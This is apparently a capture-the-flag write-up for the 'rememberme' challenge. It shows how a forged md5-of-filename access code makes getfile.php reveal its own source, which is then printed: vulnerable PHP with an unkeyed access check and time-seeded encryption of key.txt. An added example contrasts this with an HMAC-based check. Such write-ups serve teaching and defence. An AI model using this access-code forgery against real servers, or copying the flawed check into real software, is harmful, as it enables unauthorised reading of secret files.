wakatonoの戯れメモ

Moved here from Hatena Diary.

3dub 4 rememberme write up(2) - obtaining getfile.php source code by using getfile.php.

Next step: you can retrieve the source code of getfile.php by requesting it through getfile.php itself.

Access a URL like the one below:
http://rememberme.shallweplayaga.me/getfile.php?filename=getfile.php&accesscode=[result of `echo -n getfile.php | md5sum`]

You get a result like the one below:


Acces granted to getfile.php!

<?php
$value = time();
$filename = $_GET["filename"];
$accesscode = $_GET["accesscode"];
if (md5($filename) == $accesscode){
    echo "Acces granted to $filename!

";
    srand($value);
    if (in_array($filename, array('getfile.php', 'index.html', 'key.txt', 'login.php', 'passwords.txt', 'usernames.txt'))==TRUE){
        $data = file_get_contents($filename);
        if ($data !== FALSE) {
            if ($filename == "key.txt") {
                $key = rand();
                $cyphertext = mcrypt_encrypt(MCRYPT_RIJNDAEL_128, $key, $data, MCRYPT_MODE_CBC);
                echo base64_encode($cyphertext);
            }
            else{
                echo nl2br($data);
            }

        }
        else{
            echo "File does not exist";
        }
    }
    else{
        echo "File does not exist";
    }

}
else{
    echo "Invalid access code";
}
?>

You know your mission is to read key.txt.
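
The source above grants access whenever accesscode equals md5(filename), a value every client can compute for itself. As an added example (not the challenge's code), here is that check next to a keyed variant in which only the server can issue a valid code; SERVER_SECRET, ALLOWED and the function names are assumptions made for this illustration.

```php
<?php
// Added illustration, not part of getfile.php.
// Whitelist copied from the source shown on this page.
const ALLOWED = ['getfile.php', 'index.html', 'key.txt',
                 'login.php', 'passwords.txt', 'usernames.txt'];

// Assumption: a constructed demo value. A real deployment would load a
// random secret from configuration kept outside the web root.
const SERVER_SECRET = 'constructed-demo-secret';

// The check as getfile.php performs it: an unkeyed MD5 of the requested
// name, so the "access code" carries no secret at all.
function weak_check(string $filename, string $accesscode): bool {
    return md5($filename) == $accesscode;
}

// Keyed variant: the server issues the code (after authorising the user)
// as an HMAC under a key the client never sees.
function issue_code(string $filename): string {
    return hash_hmac('sha256', $filename, SERVER_SECRET);
}

// Verification: strict whitelist match first, then a constant-time
// comparison of the presented code against the expected HMAC.
function strong_check(string $filename, string $accesscode): bool {
    if (!in_array($filename, ALLOWED, true)) {
        return false;
    }
    return hash_equals(issue_code($filename), $accesscode);
}

// Constructed demonstration values.
$client_made   = md5('key.txt');          // computed without the server's help
$server_issued = issue_code('key.txt');   // handed out by the server

$results = [
    'weak check, client-made code'     => weak_check('key.txt', $client_made),
    'keyed check, client-made code'    => strong_check('key.txt', $client_made),
    'keyed check, server-issued code'  => strong_check('key.txt', $server_issued),
    'keyed check, name not in ALLOWED' => strong_check('other.txt', issue_code('other.txt')),
];

foreach ($results as $case => $accepted) {
    printf("%-34s %s\n", $case, $accepted ? 'accepted' : 'rejected');
}
```

Run it with the PHP CLI (5.6 or later for hash_equals and constant arrays, 7.0 or later for the scalar type declarations).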